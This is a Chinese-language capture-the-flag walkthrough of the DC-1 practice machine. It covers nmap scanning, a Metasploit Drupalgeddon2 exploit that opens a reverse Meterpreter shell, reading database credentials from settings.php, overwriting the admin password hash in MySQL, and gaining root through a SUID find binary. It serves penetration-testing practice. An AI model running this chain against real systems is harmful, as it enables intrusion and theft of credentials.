3. DC-1靶机

【offensive-security】3.DC-1靶机

dc-1_1.png

一、获取靶机信息

1.已知信息：

• IP: 192.168.245.193

2.获取信息：

• nmap扫描开启的服务

┌──(root㉿0xlo0p)-[/home/lo0p]
└─# nmap -sV -A 192.168.245.193
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-26 14:45 CST
Nmap scan report for 192.168.245.193
Host is up (0.34s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
|   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp  open  http    Apache httpd 2.2.22 ((Debian))
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-generator: Drupal 7 (http://drupal.org)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          50550/tcp6  status
|   100024  1          55270/udp   status
|   100024  1          55271/udp6  status
|_  100024  1          57092/tcp   status
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=10/26%OT=22%CT=1%CU=31332%PV=Y%DS=2%DC=T%G=Y%TM=6358D7
OS:C6%P=aarch64-unknown-linux-gnu)SEQ(SP=105%GCD=1%ISR=10A%TI=Z%II=I%TS=8)S
OS:EQ(SP=106%GCD=1%ISR=109%TI=Z%TS=8)OPS(O1=M54EST11NW4%O2=M54EST11NW4%O3=M
OS:54ENNT11NW4%O4=M54EST11NW4%O5=M54EST11NW4%O6=M54EST11)WIN(W1=3890%W2=389
OS:0%W3=3890%W4=3890%W5=3890%W6=3890)ECN(R=Y%DF=Y%T=40%W=3908%O=M54ENNSNW4%
OS:CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40
OS:%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 256/tcp)
HOP RTT       ADDRESS
1   429.93 ms 192.168.49.1
2   430.05 ms 192.168.245.193

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 82.49 seconds

首先先查看80端口，是一个CMS站点，Drupal 7 上msf查看有无可利用的漏洞

• MSF getshell Drupal 7

┌──(lo0p㉿0xlo0p)-[~]
└─$ msfconsole                                        

       =[ metasploit v6.1.27-dev                          ]
+ -- --=[ 2196 exploits - 1162 auxiliary - 400 post       ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: You can upgrade a shell to a Meterpreter 
session on many platforms using sessions -u 


msf6 > search Drupal

Matching Modules
================

   #  Name                                           Disclosure Date  Rank       Check  Description
   -  ----                                           ---------------  ----       -----  -----------
   0  exploit/unix/webapp/drupal_coder_exec          2016-07-13       excellent  Yes    Drupal CODER Module Remote Command Execution
   1  exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection
   2  exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  No     Drupal HTTP Parameter Key/Value SQL Injection
   3  auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Yes    Drupal OpenID External Entity Injection
   4  exploit/unix/webapp/drupal_restws_exec         2016-07-13       excellent  Yes    Drupal RESTWS Module Remote PHP Code Execution
   5  exploit/unix/webapp/drupal_restws_unserialize  2019-02-20       normal     Yes    Drupal RESTful Web Services unserialize() RCE
   6  auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Yes    Drupal Views Module Users Enumeration
   7  exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution

有N多选择，这里我测试了使用2018年的API属性注入漏洞

msf6 > use exploit/unix/webapp/drupal_drupalgeddon2
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.245.193
rhosts => 192.168.245.193
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set lhost 192.168.49.245
lhost => 192.168.49.245
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run

[*] Started reverse TCP handler on 192.168.49.245:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Sending stage (39282 bytes) to 192.168.245.193
[*] Meterpreter session 1 opened (192.168.49.245:4444 -> 192.168.245.193:40926 ) at 2022-10-26 14:52:33 +0800

meterpreter > shell
Process 3438 created.
Channel 0 created.
ls    
COPYRIGHT.txt
INSTALL.mysql.txt
INSTALL.pgsql.txt
INSTALL.sqlite.txt
INSTALL.txt
LICENSE.txt
MAINTAINERS.txt
README.txt
UPGRADE.txt
authorize.php
cron.php
flag1.txt
includes
index.php
install.php
misc
modules
profiles
robots.txt
scripts
sites
themes
update.php
web.config
xmlrpc.php
cat flag1.txt
Every good CMS needs a config file - and so do you.

进入shell以后发现当前用户为www-data，是一个低权限用户，当前目录下有一个flag1.txt，提示我们去查找一下这个cms站点的配置文件，于是乎去百度

Drupal 默认安装的目录结构 - 腾讯云开发者社区-腾讯云 (tencent.com)

配置文件在： sites/default/settings.php，下面截取重要信息部分

cat settings.php
 
  array (
    'default' => 
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

/**

拿到了数据库的库名、用户、密码以及第二个flag提示，于是我们进去数据库看看

python -c 'import pty;pty.spawn("/bin/bash")'         
www-data@DC-1:/var/www$ mysql -u dbuser -pR0ck3t
mysql -u dbuser -pR0ck3t
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 79
Server version: 5.5.60-0+deb7u1 (Debian)

Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> use R0ck3t
use R0ck3t
ERROR 1044 (42000): Access denied for user 'dbuser'@'localhost' to database 'R0ck3t'
mysql> use drupaldb
use drupaldb
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+-----------------------------+
| Tables_in_drupaldb          |
+-----------------------------+
| users                       |
| users_roles                 |
| variable                    |
| views_display               |
| views_view                  |
| watchdog                    |
+-----------------------------+
80 rows in set (0.00 sec)

mysql> select * from users;
select * from users;
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| uid | name  | pass                                                    | mail              | theme | signature | signature_format | created    | access     | login      | status | timezone            | language | picture | init              | data |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
|   0 |       |                                                         |                   |       |           | NULL             |          0 |          0 |          0 |      0 | NULL                |          |       0 |                   | NULL |
|   1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | [email protected] |       |           | NULL             | 1550581826 | 1550583852 | 1550582362 |      1 | Australia/Melbourne |          |       0 | [email protected] | b:0; |
|   2 | Fred  | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | [email protected]  |       |           | filtered_html    | 1550581952 | 1550582225 | 1550582225 |      1 | Australia/Melbourne |          |       0 | [email protected]  | b:0; |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
3 rows in set (0.00 sec)

先使用python创建一个交互式的shell，否则进不去mysql

我们经过查询，拿到了该站点的用户表数据，但是密码是加密的，这个时候想想上面flag2的提示

Brute force and dictionary attacks aren't the only ways to gain access (and you WILL need access). What can you do with these credentials?

暴力和字典攻击并不是获得访问权限的唯一途径（而且您需要访问权限）。你能用这些凭据做什么？

提示不一定需要爆破，那我们就去百度一下Drupal的密码加密规则

如何重置Drupal 7的用户密码 - 雨滴米 - ITeye博客

www-data@DC-1:/var/www$ php scripts/password-hash.sh "123456"
php scripts/password-hash.sh "123456"

password: 123456                hash: $S$D56GLmbar5i7NKVMZIoZdTFCRKejES4RMKp311ymjs6/0T4BOtoA

拿到了新的hash，我们进mysql update一下就可以登录了

mysql> update users set pass='$S$D56GLmbar5i7NKVMZIoZdTFCRKejES4RMKp311ymjs6/0T4BOtoA' where name='admin';

修改后我们进入web系统，使用admin登录，并且找到了flag3的提示

dc-1_2.png

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

特殊的PERMS将有助于找到密码，但您需要执行该命令来确定如何获取阴影中的内容。

提示给的很到位了，我们去查找具有SUID权限的可执行文件

www-data@DC-1:/var/www$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs

一眼看中了find命令，https://gtfobins.github.io/gtfobins/find/ 找到了find的利用点，并成功提权root，拿到了第一个key和flag4提示

www-data@DC-1:/var/www$ find . -exec /bin/sh \; -quit
find . -exec /bin/sh \; -quit
# whoami
whoami
root
# cd /home
cd /home
# ls
ls
flag4  local.txt
# cat local.txt
cat local.txt
a68de45775de2a3c662c669556630844
# cd flag4
cd flag4
# ls  
ls
flag4.txt
# cat flag4.txt
cat flag4.txt
Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy.  Or maybe it is?

我们进root的目录看下

# cd /root
cd /root
# ls
ls
proof.txt  thefinalflag.txt
# cat thefinalflag.txt
cat thefinalflag.txt
Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
# cat proof.txt
cat proof.txt
f06c05f682238e5ea97034108a9caa74

收工